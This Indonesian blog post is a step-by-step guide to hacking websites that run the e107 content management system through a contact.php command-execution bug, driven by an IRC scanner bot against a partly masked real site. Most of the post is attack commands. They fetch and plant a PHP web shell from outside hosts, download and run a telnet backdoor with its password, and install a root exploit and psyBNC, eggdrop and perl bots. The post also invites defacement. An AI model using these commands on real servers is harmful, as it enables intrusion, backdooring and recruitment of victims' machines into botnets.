MERDEKA

Jumat, 16 Juli 2010

Hacking e107 Website

Apa itu e107?
"e107 is a content management system written in PHP and using the popular open source MySQL database system for content storage. It's completely free, totally customisable and in constant development." (http://e107.org/news.php).

Software gratisan yang memudahkan kita membangun sebuah website dinamis.

Banyak sekali pengguna e107 hingga popularitas software ini tak kalah hebatnya dengan joomla! dan Drupal.
Tapi taukah Anda bahwa e107 free software ini memuat bugz di file /contact.php? Dengan cara yang sederhana Anda bisa melakukan tanam shell, instal telnet, get access root, deface, instal Unreal, psyBNC, bot, waduh.. parah... kasian shellnya nanti ae...

Udah ah basa-basinya, berikut cara hacking website e107 (ingat, note ini sekedar pembelajaran akan arti ketaksempurnaan, bukan untuk mengajarkan kerusakan. Segala penyalahgunaan informasi dari note ini adalah semata-mata menjadi tanggung jawab Anda. )

Pakai bot ini e107 scanner untuk scanning target dan eksploitasi (biar cepet & mudah ja). Anda juga bisa baca2 sistematika eksploitasinya http://www.exploit-db.com/exploits/12715
on IRCnetwork:
!e107 "This site is powered by e107"

Pilih satu target misal: http://www.f*asher.msk.su/contact.php
Mau apa sekarang? pilih ini salah satu:
1. Mengetahui direktori home
!cmd www.f*asher.msk.su exec(pwd)
Hasil: /home/sloki/user/t85564/sites/everybodylovesirene.com/www/v2

2. List file and folder suatu direktori
!cmd www.f*asher.msk.su exec('cd /var/tmp; ls')

3. Mengetahui current folder yang fullwrite
!cmd www.f*asher.msk.su exec(base64_decode(\'ZmluZCAuIC10eXBlIGQgLXBlcm0gLTIgLWxz'\))
Hasil: /new/e107_files/cache

4. Tanam shell
!cmd www.f*asher.msk.su exec('cd /usr/home/bkdevils/domains/flasher.msk.su/public_html/magazin/templates_c;fetch http://ravenzzz.fileave.com/fxshell.txt;mv fxshell.txt shell.php;')

kalo berhasil, php shell berbentuk: http://www.f*asher.msk.su//magazin/templates_c/shell.php?

5. Install telnet
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://t.i.a.n.tripod.com/data/blind.tar.gz;tar -zxvf blind.tar.gz;rm blind.tar.gz;./blind;rm -rf blind ')

host: www.f*asher.msk.su
port: 1953
password: samboda

6. install root
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://maybe8.webs.com/root.pl;perl root.pl ')

7. install psyBNC
!cmd www.f*asher.msk.su ('cd /var/tmp;$h http://cimpli.uni.cc/irc/psy.tgz;tar -zxvf psy.tgz;rm psy.tgz;cd .cpanel;./config rontok 5566;./run psybnc')

8. Install eggdrop
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://maybe8.webs.com/e.tgz;tar -zxvf e.tgz;rm e.tgz ;cd .httpd;./crot nick ident ip channel owner;./run nick')
* Kalo perlu wget sekalian terobot.conf yang sudah Anda edit

9. Install bot perl
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget www.loyalmoses.com/junk/vopcrew_multiscanner.txt;perl vopcrew_multiscanner.txt')

10. Mengetahui type kernel
!cmd www.f*asher.msk.su php_uname()
hasil: Linux srv140 2.6.26-2-vserver-amd64 #1 SMP Thu Feb 11 02:19:12 UTC 2010 x86_64

11. mengetahui disable commands
!cmd www.f*asher.msk.su ini_get('disable_functions')
hasil:
disk_total_space, diskfreespace, exec, system, popen, proc_open, proc_nice, shell_exec, passthru, dl

Botnya serasa terintegrasi dengan shell, attacker bisa mengelola shell layaknya login telnet. Anda bisa mereplace index.php juga lho hati2 dengan defacing..

  1. Bagi Anda pemakai e107, saya sarankan segera patching bug di site Anda, biar aman gitu.. Join di e107 community untuk mendapatkan informasi terkait e107. Site Keren, Secure Aman..

Tidak ada komentar:

Posting Komentar